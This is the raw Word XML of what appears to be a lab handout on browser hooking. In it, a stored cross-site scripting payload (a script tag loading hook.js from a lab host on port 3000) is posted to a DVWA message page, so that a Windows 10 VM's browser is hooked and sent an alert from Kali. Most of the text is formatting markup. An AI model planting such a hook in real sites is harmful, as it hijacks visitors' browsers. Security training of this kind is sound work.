        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E00DD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;script src="http://10.0</w:t>
      </w:r>
      <w:r w:rsidR="00377761">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E00DD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E00DD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">3000/hook.js"&gt;&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00377761" w:rsidRDefault="00377761" w:rsidP="00FC5A59">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New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17C95935" wp14:editId="109FCBC2">
            <wp:extent cx="5078693" cy="3166044"/>
            <wp:effectExtent l="152400" t="152400" r="370205" b="3587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83513" cy="31690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104E1" w:rsidRDefault="00377761" w:rsidP="00604B5A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New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6840AD1A" wp14:editId="2D4B6A72">
            <wp:extent cx="5181159" cy="1686091"/>
            <wp:effectExtent l="152400" t="152400" r="362585" b="3714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23557" cy="16998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104E1" w:rsidRDefault="002D79BD" w:rsidP="002D79BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New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Hook Win10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711BCB" w:rsidRPr="002D79BD" w:rsidRDefault="00711BCB" w:rsidP="002D79BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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2D79BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Open Win10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711BCB" w:rsidRPr="002D79BD" w:rsidRDefault="00711BCB" w:rsidP="002D79BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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2D79BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Go to DMVW</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711BCB" w:rsidRPr="002D79BD" w:rsidRDefault="00711BCB" w:rsidP="002D79BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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2D79BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Set Security level as low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00711BCB" w:rsidRPr="002D79BD" w:rsidRDefault="00711BCB" w:rsidP="002D79BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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2D79BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Visit the message page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004104E1" w:rsidRPr="0073265C" w:rsidRDefault="004104E1" w:rsidP="0073265C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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73265C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Win 10 is hooked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6698" w:rsidRDefault="004104E1" w:rsidP="0073265C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"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7482F4CD" wp14:editId="348EE052">
            <wp:extent cx="5412402" cy="2412451"/>
            <wp:effectExtent l="152400" t="152400" r="360045" b="3689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14738" cy="24134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B4EE7" w:rsidRPr="008B4EE7" w:rsidRDefault="008B4EE7" w:rsidP="008B4EE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="120" w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B4EE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Attack Win 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Kali sends an alert message for demo purpose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055640E" w:rsidRPr="00E00DD6" w:rsidRDefault="009E6698" w:rsidP="00604B5A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New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2582FFFE" wp14:editId="7F4E877B">
            <wp:extent cx="5502257" cy="2157990"/>
            <wp:effectExtent l="152400" t="152400" r="365760" b="3568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15084" cy="21630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55640E" w:rsidRPr="00E00DD6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006542B7" w:rsidRPr="0055640E" w:rsidRDefault="006542B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0055640E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reference</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00633244" w:rsidRPr="002975AE" w:rsidRDefault="00633244" w:rsidP="002975AE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2975AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>https://information.rapid7.com/metasploitable-download.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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p w:rsid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p w:rsid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p w:rsidR="00F661BD" w:rsidRPr="00F661BD" w:rsidRDefault="00F661BD" w:rsidP="00F661BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F661BD" w:rsidRPr="00F661BD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95809" w:rsidRDefault="00C95809" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C95809" w:rsidRDefault="00C95809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3244" w:rsidRDefault="00633244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633244" w:rsidRPr="00AF6EFD" w:rsidRDefault="00633244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D34182" w:rsidRPr="00D34182">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r w:rsidRPr="00AF6EFD">
      <w:rPr>
        <w:rFonts w:ascii="Segoe Print" w:hAnsi="Segoe Print"/>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00633244" w:rsidRPr="009C26E5" w:rsidRDefault="00633244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95809" w:rsidRDefault="00C95809" w:rsidP="00EB2649">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C95809" w:rsidRDefault="00C95809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33244" w:rsidRPr="0074054E" w:rsidRDefault="00633244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:rsidR="00633244" w:rsidRPr="009C26E5" w:rsidRDefault="00633244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F0CAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF524A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2FA51FA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75D2ED3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>
    <w:nsid w:val="0E700C19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02C80E2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ind w:left="792" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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1AF1461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D42A9B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1A4F2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52B08A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>
    <w:nsid w:val="18AE71DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8C83CF6"/>
    <w:lvl w:ilvl="0" w:tplc="2856C7EC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91C0B8D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1A597706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>
    <w:nsid w:val="1E764DA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A56A81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5852B2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32621B1E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7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725315"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF524A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529D0BFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B338ED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1">
    <w:nsid w:val="55B128E8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>
    <w:nsid w:val="5C2B247A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48A5F89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90EAF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56F295F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66E2424B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF524A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703A2140"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14E04C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8">
    <w:nsid w:val="78047F8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A410794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>
    <w:nsid w:val="787C02AB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>
    <w:nsid w:val="79021334"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D4EA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8"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="7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4FANm8jtktAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00615E00"/>
    <w:rsid w:val="00006176"/>
    <w:rsid w:val="0001540C"/>
    <w:rsid w:val="000161F5"/>
    <w:rsid w:val="000170C8"/>
    <w:rsid w:val="00042B97"/>
    <w:rsid w:val="000532E1"/>
    <w:rsid w:val="00055445"/>
    <w:rsid w:val="00056774"/>
    <w:rsid w:val="00056B0A"/>
    <w:rsid w:val="00060A7A"/>
    <w:rsid w:val="00065882"/>
    <w:rsid w:val="000676CC"/>
    <w:rsid w:val="000A1411"/>
    <w:rsid w:val="000D394C"/>
    <w:rsid w:val="00130C21"/>
    <w:rsid w:val="00140818"/>
    <w:rsid w:val="0015343A"/>
    <w:rsid w:val="00165FCA"/>
    <w:rsid w:val="00175118"/>
    <w:rsid w:val="00186F68"/>
    <w:rsid w:val="001A1888"/>
    <w:rsid w:val="001A663D"/>
    <w:rsid w:val="001B5B62"/>
    <w:rsid w:val="001C1CAE"/>
    <w:rsid w:val="001D6350"/>
    <w:rsid w:val="001F42CE"/>
    <w:rsid w:val="00213494"/>
    <w:rsid w:val="0022091C"/>
    <w:rsid w:val="00227881"/>
    <w:rsid w:val="00265FEC"/>
    <w:rsid w:val="002823B1"/>
    <w:rsid w:val="00285F2E"/>
    <w:rsid w:val="002975AE"/>
    <w:rsid w:val="002A278A"/>
    <w:rsid w:val="002D79BD"/>
    <w:rsid w:val="002E4979"/>
    <w:rsid w:val="002E5842"/>
    <w:rsid w:val="002E5925"/>
    <w:rsid w:val="00303E10"/>
    <w:rsid w:val="00307B16"/>
    <w:rsid w:val="0031104A"/>
    <w:rsid w:val="0032426B"/>
    <w:rsid w:val="00325561"/>
    <w:rsid w:val="00334C66"/>
    <w:rsid w:val="00342BC7"/>
    <w:rsid w:val="003466F2"/>
    <w:rsid w:val="00353DA4"/>
    <w:rsid w:val="003637C9"/>
    <w:rsid w:val="00370BE3"/>
    <w:rsid w:val="00374345"/>
    <w:rsid w:val="00377761"/>
    <w:rsid w:val="003D4F9B"/>
    <w:rsid w:val="003E1F7E"/>
    <w:rsid w:val="003E3A4F"/>
    <w:rsid w:val="003F0F68"/>
    <w:rsid w:val="0040093A"/>
    <w:rsid w:val="004104E1"/>
    <w:rsid w:val="0041764B"/>
    <w:rsid w:val="0043542E"/>
    <w:rsid w:val="0044590F"/>
    <w:rsid w:val="0046514E"/>
    <w:rsid w:val="004747E9"/>
    <w:rsid w:val="004779BB"/>
    <w:rsid w:val="004919BF"/>
    <w:rsid w:val="004A2C2C"/>
    <w:rsid w:val="004B18DC"/>
    <w:rsid w:val="004B368E"/>
    <w:rsid w:val="00522AD0"/>
    <w:rsid w:val="005230BF"/>
    <w:rsid w:val="00531D6F"/>
    <w:rsid w:val="0054590D"/>
    <w:rsid w:val="00550096"/>
    <w:rsid w:val="0055640E"/>
    <w:rsid w:val="005613F5"/>
    <w:rsid w:val="00561E97"/>
    <w:rsid w:val="00574A55"/>
    <w:rsid w:val="0057571C"/>
    <w:rsid w:val="0058093E"/>
    <w:rsid w:val="00590ECB"/>
    <w:rsid w:val="00594AD1"/>
    <w:rsid w:val="005A3141"/>
    <w:rsid w:val="005D4228"/>
    <w:rsid w:val="005E2847"/>
    <w:rsid w:val="00604B5A"/>
    <w:rsid w:val="00610963"/>
    <w:rsid w:val="00613CAB"/>
    <w:rsid w:val="00613D0C"/>
    <w:rsid w:val="00615E00"/>
    <w:rsid w:val="00623879"/>
    <w:rsid w:val="00625802"/>
    <w:rsid w:val="006274CD"/>
    <w:rsid w:val="00633244"/>
    <w:rsid w:val="00641506"/>
    <w:rsid w:val="00643173"/>
    <w:rsid w:val="00652256"/>
    <w:rsid w:val="00653A1A"/>
    <w:rsid w:val="006542B7"/>
    <w:rsid w:val="00667B0B"/>
    <w:rsid w:val="00686EE0"/>
    <w:rsid w:val="006B6294"/>
    <w:rsid w:val="006B6771"/>
    <w:rsid w:val="006C4A2E"/>
    <w:rsid w:val="006D2346"/>
    <w:rsid w:val="006D43CC"/>
    <w:rsid w:val="006E3591"/>
    <w:rsid w:val="006E378F"/>
    <w:rsid w:val="006F0412"/>
    <w:rsid w:val="00711BCB"/>
    <w:rsid w:val="0071597A"/>
    <w:rsid w:val="007220D5"/>
    <w:rsid w:val="0073265C"/>
    <w:rsid w:val="0074054E"/>
    <w:rsid w:val="00740B7D"/>
    <w:rsid w:val="00756082"/>
    <w:rsid w:val="0077037E"/>
    <w:rsid w:val="00770985"/>
    <w:rsid w:val="007A31EE"/>
    <w:rsid w:val="007A5427"/>
    <w:rsid w:val="007A7691"/>
    <w:rsid w:val="007B48E1"/>
    <w:rsid w:val="007B574F"/>
    <w:rsid w:val="007D6519"/>
    <w:rsid w:val="007F31C8"/>
    <w:rsid w:val="00804360"/>
    <w:rsid w:val="008123EF"/>
    <w:rsid w:val="0081564B"/>
    <w:rsid w:val="00834243"/>
    <w:rsid w:val="00834E88"/>
    <w:rsid w:val="00836EEE"/>
    <w:rsid w:val="0085406B"/>
    <w:rsid w:val="00860F91"/>
    <w:rsid w:val="00862FD1"/>
    <w:rsid w:val="00867176"/>
    <w:rsid w:val="008839E7"/>
    <w:rsid w:val="008A73E8"/>
    <w:rsid w:val="008B4EE7"/>
    <w:rsid w:val="008C575B"/>
    <w:rsid w:val="008E018A"/>
    <w:rsid w:val="008E20C1"/>
    <w:rsid w:val="00934427"/>
    <w:rsid w:val="00962BD0"/>
    <w:rsid w:val="009632DC"/>
    <w:rsid w:val="00970B29"/>
    <w:rsid w:val="009801A3"/>
    <w:rsid w:val="00980E14"/>
    <w:rsid w:val="009855CC"/>
    <w:rsid w:val="009A4150"/>
    <w:rsid w:val="009B2F3B"/>
    <w:rsid w:val="009B491C"/>
    <w:rsid w:val="009C26E5"/>
    <w:rsid w:val="009C33D9"/>
    <w:rsid w:val="009D36FB"/>
    <w:rsid w:val="009D7814"/>
    <w:rsid w:val="009E6698"/>
    <w:rsid w:val="009E7C2D"/>
    <w:rsid w:val="009F05C2"/>
    <w:rsid w:val="00A11EA8"/>
    <w:rsid w:val="00A439E8"/>
    <w:rsid w:val="00A4680C"/>
    <w:rsid w:val="00A5001E"/>
    <w:rsid w:val="00A60AC4"/>
    <w:rsid w:val="00A74989"/>
    <w:rsid w:val="00A809CB"/>
    <w:rsid w:val="00A959CE"/>
    <w:rsid w:val="00A96CCD"/>
    <w:rsid w:val="00AB11A6"/>
    <w:rsid w:val="00AB2CE6"/>
    <w:rsid w:val="00AC090D"/>
    <w:rsid w:val="00AC2A1A"/>
    <w:rsid w:val="00AC3D2E"/>
    <w:rsid w:val="00AE217D"/>
    <w:rsid w:val="00AE4EDB"/>
    <w:rsid w:val="00AE61D9"/>
    <w:rsid w:val="00AF6EFD"/>
    <w:rsid w:val="00B20BD0"/>
    <w:rsid w:val="00B21540"/>
    <w:rsid w:val="00B23759"/>
    <w:rsid w:val="00B372CB"/>
    <w:rsid w:val="00B408C9"/>
    <w:rsid w:val="00B608B2"/>
    <w:rsid w:val="00B800DC"/>
    <w:rsid w:val="00B86D16"/>
    <w:rsid w:val="00B877EE"/>
    <w:rsid w:val="00BB5835"/>
    <w:rsid w:val="00BD1991"/>
    <w:rsid w:val="00BD2BF6"/>
    <w:rsid w:val="00BE152E"/>
    <w:rsid w:val="00BF1705"/>
    <w:rsid w:val="00C13C59"/>
    <w:rsid w:val="00C27D10"/>
    <w:rsid w:val="00C507A5"/>
    <w:rsid w:val="00C673DB"/>
    <w:rsid w:val="00C75282"/>
    <w:rsid w:val="00C95809"/>
    <w:rsid w:val="00CB1F5D"/>
    <w:rsid w:val="00CB22A5"/>
    <w:rsid w:val="00CD63FA"/>
    <w:rsid w:val="00CF7D06"/>
    <w:rsid w:val="00D03235"/>
    <w:rsid w:val="00D06342"/>
    <w:rsid w:val="00D143E7"/>
    <w:rsid w:val="00D224C2"/>
    <w:rsid w:val="00D34182"/>
    <w:rsid w:val="00D346F3"/>
    <w:rsid w:val="00D41DD6"/>
    <w:rsid w:val="00D43091"/>
    <w:rsid w:val="00D55371"/>
    <w:rsid w:val="00D82EAA"/>
    <w:rsid w:val="00D852BD"/>
    <w:rsid w:val="00DA361E"/>
    <w:rsid w:val="00DB2B28"/>
    <w:rsid w:val="00DB5607"/>
    <w:rsid w:val="00DB7434"/>
    <w:rsid w:val="00DC1D59"/>
    <w:rsid w:val="00DC57E5"/>
    <w:rsid w:val="00DD2425"/>
    <w:rsid w:val="00DE26BC"/>
    <w:rsid w:val="00E00DD6"/>
    <w:rsid w:val="00E14A75"/>
    <w:rsid w:val="00E310E0"/>
    <w:rsid w:val="00E6402C"/>
    <w:rsid w:val="00E669BC"/>
    <w:rsid w:val="00E70050"/>
    <w:rsid w:val="00E97CB5"/>
    <w:rsid w:val="00EB2649"/>
    <w:rsid w:val="00EB53E8"/>
    <w:rsid w:val="00EE30FE"/>
    <w:rsid w:val="00F12F2A"/>
    <w:rsid w:val="00F15ABA"/>
    <w:rsid w:val="00F32F64"/>
    <w:rsid w:val="00F638F2"/>
    <w:rsid w:val="00F661BD"/>
    <w:rsid w:val="00F70001"/>
    <w:rsid w:val="00F84BB3"/>
    <w:rsid w:val="00FA6D87"/>
    <w:rsid w:val="00FC5A59"/>
    <w:rsid w:val="00FC624B"/>
    <w:rsid w:val="00FF7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346"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16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23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2346"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi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hyperlink" Target="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms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AD60E8-F775-4985-A0E6-A226A63D6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4</TotalTime>
  <Pages>8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PC_Tech</cp:lastModifiedBy>
  <cp:revision>198</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-19T22:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-02T14:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>